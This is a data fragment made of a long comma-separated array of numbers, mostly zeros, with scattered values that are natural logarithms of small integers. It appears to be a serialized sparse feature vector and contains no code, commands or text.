0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 2.5649493574615367, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 1.791759469228055, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 5.662960480135945, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.6931471805599453, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0,\n 3.044522437723423, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 2.5649493574615367, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 2.6390573296152584, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 3.0841946160253877, 0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0, 0.0, 0.0, 0, 0.0, 0.0, 1.6094379124341003, 1.6094379124341003, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 2.9444389791664403, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0, \n 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0, 0, 0.0, 1.0986122886681098, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0, 0.0, 0, 0, 0.0, 9.887510598012987, 0.0, 0, 0, 0.0, 0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.6931471805599453, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 6.437751649736401, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, \n 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 4.553876891600541, 0.0, 0.0, 0, 4.3694478524670215,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.6931471805599453, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 1.0986122886681098, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0, \n 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 1.7412592803704001, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0, 0.0, 0.0, 0.0, 1.0986122886681098, 1.7412592803704001, 0.0, 0.0, 0.0,\n 0, 0, 0.0, 1.6094379124341003, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 1.0986122886681098, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 1.0986122886681098, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 2.9444389791664403, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0,\n 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, \n 1.9459101490553132, 0, 0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0, 1.6094379124341003, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 5.723585101952381, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.6931471805599453, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0, \n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0, 2.302585092994046, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 4.143134726391533, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 16.025617661073383, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, \n 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0, 0.0, 0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 1.3862943611198906, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 5.390770307485499, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 6.665683717782408, \n 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0,\n 7.299022054230198, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, \n 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0,\n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0,\n 0.0, 0, 0, 0.0, 0, 1.0986122886681098, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 4.631631038266565, 0.0, 0.0, 0,\n 0.0, 0.0, 0, 0, 0, 0, 0.0, 0.6931471805599453, 0.0, 0.0, 0.0, 0, 0.0, 0,\n 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 4.182806904693497, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 1.3862943611198906, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0,\n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.0910424533583156, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, \n 0.0, 0.6931471805599453, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0, 0.0, 2.8398715690385097, 1.791759469228055, 0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.6931471805599453, 0, 0.0, 0.0, 0.0, 1.6094379124341003,\n 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 1.0986122886681098, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, \n 0.0, 3.58351893845611, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 6.20455776256869, 0.0,\n 0.0, 0.0, 0.0, 2.9444389791664403, 0.0, 2.70805020110221, 0.0, 0.0, 